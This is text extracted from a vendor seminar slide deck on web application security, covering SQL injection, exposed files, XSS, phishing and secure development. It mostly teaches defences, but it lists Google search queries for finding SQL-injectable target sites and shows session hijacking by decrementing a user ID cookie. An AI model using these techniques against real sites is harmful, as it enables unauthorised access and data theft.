Top Web App Attack Methods and How to Combat Them

Dennis Hurst, SPI Dynamics

Schedule: 9:30~10:00 Breakfast

10:00~11:30 Presentation
11:30~12:00 Break / Demo
Agenda

Who is SPI Dynamics

The Evolution of Web Applications and Why
They Need to Be Secured
Web Application Vulnerabilities in Depth
Managing Web Application Vulnerabilities
Closing and Q&A

SPI Dynamics Confidential

SPI Dynamics

The expert in web application security testing and enterprise security

risk management
Established market and thought leader
Introduction of product line for application lifecycle and AMP
Multiple patent applications completed and pending
Co-creator of AVDL interoperability standard and other industry
leading consortiums

WebInspect assesses the security of applications and web services

throughout the application lifecycle
Development QA
Production Audit

SPI Labs
Research and development group
Recognized as leading authority on
web application security

SPI Dynamics Confidential

SPI Dynamics

Founded January 2000 by web Annual Company Growth

application and security experts
Focused on web application
security testing and vulnerability
assessment market
600+ Customers
Noted as the fastest growing
company (with 380% growth)
by IDC in December 2003
report by Charles J. Kolodgy
Strong in F500, federal and
state government
2001 2002 2003 2004
#1 in customer growth, #1 in
Customers Revenue
market share

SPI Dynamics Confidential

Selected Commercial Customers

SPI Dynamics Confidential

Selected Government Customers

SPI Dynamics Confidential

Web Sites

Simple, single server solutions

Browser Web Server

HTML

SPI Dynamics Confidential

Web Applications

Very complex architectures, multiple platforms,

multiple protocols

Web Services

Application Database
Wireless Web Servers Server Server
Presentation Business Customer
Layer Logic Identification
Media Store Content Access
Browser Services Controls

Transaction
Information

Core Business
Data

SPI Dynamics Confidential

 Web Applications Breach the Perimeter

Internet DMZ Trusted

Inside
IIS ASP
SunOne .NET
SQL
WebSphere
Apache Oracle
Java
DB2

HTTP(S)
Corporate
Inside
Firewall only Firewall only Firewall only
IMAP FTP allows PORT 80 allows allows application
SSH TELNET (or 443 SSL) applications server to talk to
POP3
traffic from the on the web database server.
Internet to the server to talk to
web server. application
server.
Any Web
Server: 80

SPI Dynamics Confidential

Part Two

Web Application Vulnerabilities in Depth

Why Web Application Vulnerabilities Occur

Web Application Attack Methodologies

SPI Dynamics Confidential

Why Web Application Risks Occur

The Web Application

Security Security Gap Application
Professionals Developers and
Dont Know The QA Professionals
Applications Dont Know
As a Network Security Security
Professional, I dont As an Application
know how my Developer, I can
companies web build great features
applications are and functions while
supposed to work so I meeting deadlines,
deploy a protective but I dont know
solutionbut dont how to develop my
know if its protecting web application
what its supposed to. with security as a
feature.

SPI Dynamics Confidential

Web Application Vulnerabilities

Web application vulnerabilities

occur in multiple areas.
Application
Application Mapping

Administration Cookie Manipulation

Extension Checking Custom Application

Scripting
Common File Checks
Parameter Manipulation
Data Extension
Checking Reverse Directory
Platform Transversal
Backup Checking
Known Brute Force
Vulnerabilities Directory
Enumeration Application Mapping

Path Truncation Cookie Poisoning/Theft

Hidden Web Paths Buffer Overflow

Forceful Browsing SQL Injection

Cross-site scripting

SPI Dynamics Confidential

Web Application Vulnerabilities

Platform:
Known vulnerabilities can be
exploited immediately with a
minimum amount of skill or
experience script kiddies
Most easily defendable of all
Platform web vulnerabilities
Known MUST have streamlined
Vulnerabilities patching procedures
MUST have inventory process

SPI Dynamics Confidential

Web Application Vulnerabilities

Administration:
Less easily corrected than known
issues
Administration Require increased awareness
Extension Checking More than just configuration, must
Common File Checks be aware of security flaws in actual
Data Extension content
Checking
Backup Checking
Remnant files can reveal
applications and versions in use
Directory
Enumeration Backup files can reveal source code
Path Truncation and database connection strings
Hidden Web Paths
Forceful Browsing

SPI Dynamics Confidential

Common file vulnerabilities

Robots.txt
shows files that the administrator does not want
search engines to crawl
Dont show confidential information in this file

SPI Dynamics Confidential

Common file vulnerabilities

Web server logs & Stats folders

A web accessible web server log or Stats folder
will show WAY to much information about your
web site

SPI Dynamics Confidential

 Demonstration 1
Common file vulnerabilities
Configuration files

Remnant files
Remnant files are any files that are left on a web server that
are not in use or part of the web based application.
Remnant files can include backup files, documentation files,
default files (like samples) or any other file that is not part of
the production system.
Remnant files solutions
Never leave unnecessary files on a web server (i.e.
Web.config.old)
Assume all files on a web server will be seen by a hacker.
Encrypt secure information in configuration files

SPI Dynamics Confidential

 Demonstration 2
Configuration file vulnerabilities
Web Application Vulnerabilities

Application Programming:

Application
Application Mapping
Cookie Manipulation
Administration
Custom Application
Scripting
Parameter Manipulation
Reverse Directory
Transversal
Brute Force
Application Mapping
Cookie Poisoning/ Theft
Buffer Overflow
SQL Injection
Cross-site scripting
SPI Dynamics Confidential
Common coding techniques do not
necessarily include security
Input is assumed to be valid, but
not tested
Inappropriate file calls can reveal
source code and system files
Unexamined input from a browser
can inject scripts into page for
replay against later visitors
Unhandled error messages reveal
application and database structures
Unchecked database calls can be
piggybacked with a hackers own
database call, giving direct access
to business data through a web
browser
SQL Injection
SQL Injection

Cause: Using user provided data to build a SQL

Statement w/o validating the data first

Goal:
Pass a SQL command to the web based
application and have that command executed
on the database server
Use the exploit to steal data or damage/alter
the database.

SPI Dynamics Confidential

SQL Injection

Demo
Browser based
HTTP Based
Automated SQL Injection
Blind SQL Injection

SPI Dynamics Confidential

SQL Injection Solution

Use parameterized queries

cnn = new SqlConnection(database connection information here);
cmd = new SqlCommand("SELECT FirstName, LastName from Users
+ "WHERE UserName = @uid AND password = @passwd",cnn);
cmd.Parameters.Add("@uid", SqlDbType.VarChar, 100).Value=uid;
cmd.Parameters.Add("@passwd", SqlDbType.VarChar,100).Value = passwd;
cnn.Open();

Trap your Errors!!! Dont let the environment

Use Stored Procedures
Validate User Input
Turn off default error messages

SPI Dynamics Confidential

Federal Trade Commission investigates Guess Inc.

Guess Settles with FTC over Cyber Security Snafu, June

2003 by Kevin Poulson for SecurityFocus

Guess.com was open to an "SQL injection attack,"

permitting anyone able to construct a properly-crafted URL
to pull down every name, credit card number and
expiration date in the site's customer database -- over
200,000 in all The episode prompted a year-long FTC
investigation into alleged deceptive trade practices by
Guess

"Consumers have every right to expect that a business that

says it's keeping personal information secure is doing
exactly that," said Howard Beales, Director of the FTC's
consumer protection bureau, in a press release. "It's not
just good business, it's the law."

SPI Dynamics Confidential

Google Hacking
Google Hacking

Find vulnerable sites using google (Old method

new life)
Example Search Queries
filetype:mdb inurl:admin 180 results
Filetype:xls inurl:admin 14,100 results
ORA-00921: unexpected end of SQL
command 3,470 results
allintitle:Netscape Enterprise Server Home
Page 431 results

SPI Dynamics Confidential

Google Hacking

Take this method a step further and use it to

narrow your attack victims.
inurl:id= filetype:asp site:gov 572,000 results
inurl:id= filetype:asp site:com 7,150,000
results
inurl:id= filetype:asp site:org 3,240,000
results

Use this list as a baseline for identifying SQL

injection vulnerabilities

SPI Dynamics Confidential

Google Hacking

Take this method a step further and use it to

narrow your attack victims.
inurl:id= filetype:asp site:gov 572,000 results
inurl:id= filetype:asp site:com 7,150,000
results
inurl:id= filetype:asp site:org 3,240,000
results

Use this list as a baseline for identifying SQL

injection vulnerabilities

SPI Dynamics Confidential

Google Hacking

Took 1 hour of coding

500 vulnerable sites were found in 1 minute and
26 seconds

SPI Dynamics Confidential

Google Hacking

Find next victim

Exploit victim Exploit victim

SQL Injection Worm

SPI Dynamics Confidential

Session Hijacking
Review your account

Find where the confidential data is

SPI Dynamics Confidential

So Many Cookies

TestSess
Site cookie
Seg
TestPerm
ProfileAddressVerified
ProfileID
MEMUSER
USERID
SESSIONUSERID
PROFILE

SPI Dynamics Confidential

 Eliminate each one until the ones that matter are
left

In this case SESSIONUSERID=505741

Is the number incremental?
Keep everything the same except decrement the
number SESSIONUSERID=505740

SPI Dynamics Confidential

Phishing
 Phishing Attacks

In computing, phishing is the fraudulent acquisition, through deception, of

sensitive personal information such as passwords and credit card details,
by masquerading as someone trustworthy with a real need for such
information.
The term was coined in the mid 1990's by crackers attempting to steal AOL
accounts. An attacker would pose as an AOL staff member and send an
instant message to a potential victim. The message would ask the victim to
reveal his or her password, for instance to "verify your account" or to
"confirm billing information". Once the victim gave over the password, the
attacker could access the victim's account and use it for criminal purposes,
such as spamming.

Source: www.wikipedia.org
SPI Dynamics Confidential
 Phishing Defined

The word "phishing" comes from the analogy that Internet

scammers are using email lures to "fish" for passwords and
financial data from the sea of Internet users.
The term was coined in the 1996 timeframe by hackers who
were stealing America On-Line accounts.
The first mention on the Internet of phishing is on the alt.2600
hacker newsgroup in January 1996.
Over the years, phishing attacks grew from simply stealing AOL
dialup accounts into a more sinister criminal enterprise.

(source: www.antiphishing.org)

SPI Dynamics Confidential

Phishing Stats

Number of active phishing sites reported in January: 2560

Average monthly growth rate in phishing sites July through
January: 28%

SPI Dynamics Confidential (source: http://antiphishing.org/APWG_Phishing_Activity_Report-January2005.pdf )

 Phishing Technical Review

http://www.fakeserver.com http://www.nubank.com

GET /default.asp HTTP/1.0

Host: www.nubank.me
Accept-Language: en-us,en;q=0.5
Referer: http://www.fakenubank.me/
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8
Keep-Alive: 300

SPI Dynamics Confidential

Avoiding Phishing Attacks

Companies should NEVER send an email that asks

users to log in and change their passwords via an
embedded link.
This policy MUST be communicated to end users.
When critical account changes are made send a
verification email and lock the account until the
change is verified.
Send a notification email to users when significant
transactions are made.

SPI Dynamics Confidential

 Sample Letter to Customers

Company X Security

While the Internet is generally not a secure environment and no one

can guarantee absolute security, Company X strives to provide our
customers with a level of comfort about the security of the information
they store and transmit through our Web site.

Beware of email scams. Do not respond to unsolicited emails asking

you to validate your account information. If you receive a suspicious
email or request for your personal information supposedly from
Company X, please forward it to CustomerSecure@Company_X.com.

SPI Dynamics Confidential

Identifying Phishing attacks

Bounced emails, LOTS of bounces

Phishers will send phishing spam
Notification from customers
Referer headers being sent from unknown or
malicious Web sites
Referer: http://www.fakenubank.me/
Applications can track referer headers sent by
users browsers, detect Phishing attacks and notify
the user of the possible attack

SPI Dynamics Confidential

Responding to Phishing attacks

1. Attempt to determine who has been compromised

by the attack and take appropriate action
2. Find out who is hosting the phishing Web site
Use: http://www.samspade.org
3. Send a cease and desist letter to the ISP that is
hosting the phishing site
4. Contact Federal officials (FBI)

SPI Dynamics Confidential

Session Summary

Session Hijacking and Phishing attacks are both ways

that criminals attempt to steal users credentials and
possibly money
Minimizing the risk of these attacks requires
understanding how your application works and
recognizing the signs of a potential attack
Responding to an ongoing attack is possible but will
require some amount of up-front work to be prepared

SPI Dynamics Confidential

Phishing Resources
Individuals

www.ic3.gov Internet Crime Complaint Center

Established as a partnership between the FBI and the
National White Collar Crime Center to provide a way
to receive Internet-related criminal complaints and to
research, develop and refer the criminal complaints to
law enforcement agencies for any investigation they
deem to be appropriate.

SPI Dynamics Confidential

Phishing Resources
Companies

www.fbi.gov Federal Bureau of Investigation

Ask for the Cyber Crime Officer
Contact the FBI to report a Phishing attack
www.antiphishing.org Anti-Phishing Working Group
The Anti-Phishing Working Group (APWG) is the global pan-industrial
and law enforcement association focused on eliminating the fraud
and identity theft that result from phishing, pharming and email
spoofing of all types
Excellent resource for Phishing information
www.digitalphishnet.org Digital PhishNet
The Digital PhishNet is a joint enforcement initiative between
industry and law enforcement designed to ensnare those who
perpetrate phishing attacks
Requires specific resources within a company

SPI Dynamics Confidential

Cross Site Scripting (XSS)
Cross Site Scripting - XSS

Cross-site scripting (also know as XSS or CSS) occurs

when dynamically generated web pages display input
that is not property validated.
A user passes input in the form of a parameter to the
web server.
The web server returns the user provided input back
to the user without proper encoding.

SPI Dynamics Confidential

 Demonstration 4

Cross site scripting (XSS) example

(login.aspx)
XSS solutions

Fix
Use the validateRequest=false cautiously
Server.HTMLEncode

SPI Dynamics Confidential

Part Three

Managing and Detecting

Web Application Vulnerabilities
Changing the application development process
Assess in depth to defend in depth!
Manual vs. automated approach
WebInspects approach

SPI Dynamics Confidential

How the Industry Has Changed

1990s 2004
Zero Liability Federal Trade Commission
Regulatory requirements
GLB
HIPAA
SOX
CA1386
Legal precedents

SPI Dynamics Confidential

Testing and verifying

Web Application attacks come from many vectors

Application development is by nature an error (bug)
prone process.
Some bugs will have a security aspect.
Testing for security bugs is critical.

SPI Dynamics Confidential

Application Lifecycle Phases

Design Development

Auditors, Dev, and Developers

Business Subject
Matter Experts
(SME)

Production Testing
Security QA and
Operations Developers
and Auditors

SPI Dynamics Confidential

Application Lifecycle Phases

Audit Development

Auditors, Dev, Developers

Compliance, and
Business Subject
Matter Experts
(SME)

Production QA
Security QA and
Operations Developers
and Auditors

SPI Dynamics Confidential

Application Lifecycle Phases

Audit Development
Auditors, Dev, Developers
Compliance, and
Business Subject
Matter Experts
(SME)

Production QA
Security QA and
Operations Developers
and Auditors

SPI Dynamics Confidential

Secure Software Development Lifecycle
A Microsoft case study
Critical Components of Security

People

Creating
Secure
Applications
Process/SDL Tools

SPI Dynamics Confidential

People
Providing Developers with the Guidance to Create Secure Applications

SPI Dynamics Confidential

MSDN Developer Security Center
http://msdn.microsoft.com/security/

SPI Dynamics Confidential

Process/SDL
Security Cannot be an Afterthought

SPI Dynamics Confidential

 Security Development Lifecycle (SDL)

A PROCESS by which Microsoft develops software and defines

security requirements and milestones

Mandatory for products that are exposed to meaningful security

risk

Evolving and new factors, such as privacy, are being added

*Steve Lipner, Director of Security Engineering Strategy, Microsoft

SPI Dynamics Confidential

 Baseline Process vs. SDL Integrated

*Steve Lipner, Director of Security Engineering Strategy, Microsoft

SPI Dynamics Confidential

Accountability and Incentives

Almost 40 percent of developers say that their companies do not think it is very
important to write secure applications

CIOs, CTOs, CSOs, and ITDMs say it is very important

Current incentives on performance and ship dates

Must be driven top-down

SPI Dynamics Confidential

Early Results of the SDL

Windows pre- and post-SDL critical and important security bulletins

SQL Server 2000 pre- and post-SDL security bulletins

55

17

Exchange Server 2000 pre- and post-SDL security bulletins 455

http://msdn.microsoft.com/security/sdl

SPI Dynamics Confidential

Tools
Visual Studio Team System Security Enhancements

Hard to guess
password!

String concat
Connecting for dynamic SQL
as sysadmin

Telling the
bad guy
too much on failure

SPI Dynamics Confidential

Summary

People
Guidance
Training
Accountability

Process
Security is an evolving challenge
SDL process has proven effective at improving software security
As operating system security improves, attackers will move up the
stack
Be ready to meet the challenge
http://msdn.microsoft.com/security/sdl

Tools
People cannot find all the defects

SPI Dynamics Confidential

Application Lifecycle Phases

Development
Secure development training
Develop secure applications
Testing applications in development
QA
Testing for security bugs
Production / Security
Validating systems are secure prior to going live
Audit
Continued validation of productions systems and processes
Establish remediation processes for production systems

SPI Dynamics Confidential

Session Summary

Anything sent by a user to a web server, including

parameters, headers, cookies, etc can be modified.
Always validate input before using it or returning it to
a user.
Application development is by its nature prone to
bugs. It is critical that applications be tested to verify
the absence of parameter based vulnerabilities.

SPI Dynamics Confidential

Detecting Web Application Vulnerabilities

Manual vs. Automatic Testing

Time consuming High performance, automated
Expensive web application assessment
Not repeatable Cost effective
Time consuming Scalable throughout entire
Rely on third party application lifecycle
individuals (penetration
Consistent high quality
testers)
assessments
Provides economy of scale (SPI
Labs)
Customizable (Custom Agents)

SPI Dynamics Confidential

SPI Dynamics
Security Throughout the Application Development Lifecycle

SPI Dynamics Confidential

Start Secure. Stay Secure.

SPI Dynamics Confidential

Part Four

Closing and Q&A

Q&A
Break
WebInspect Demo
For a free 15 day trial of
WebInspect please visit
http://www.spidynamics.com

SPI Dynamics Confidential